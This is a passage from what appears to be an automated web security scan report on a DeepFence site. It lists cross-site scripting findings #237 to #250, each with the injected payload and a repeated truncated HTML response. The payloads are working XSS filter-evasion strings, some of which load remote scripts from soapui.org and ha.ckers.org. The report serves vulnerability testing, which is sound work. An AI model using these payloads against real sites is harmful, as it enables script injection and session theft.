window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #237Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #238\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #239\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #240\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > \nout\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #241\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# perl -e 'print \"<SCR\\0IPT>alert(\\\"XSS\\\")</SCR\\0IPT>\";' > \nout\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #242\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\" &#14; javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #243\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT/XSS SRC=\"http://soapui.org/xss.js\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #244\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #245Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT/SRC=\"http://soapui.org/xss.js\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #246\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <<SCRIPT>alert(\"XSS\");//<</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #247\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT SRC=http://soapui.org/xss.js?<B\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #248\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# <SCRIPT SRC=//ha.ckers.org/.j\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #249\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <IMG SRC=\"javascript:alert('XSS')\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be DemoUser1# \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #250\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# <iframe src=http://soapui.org/scriptlet.html\n<\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 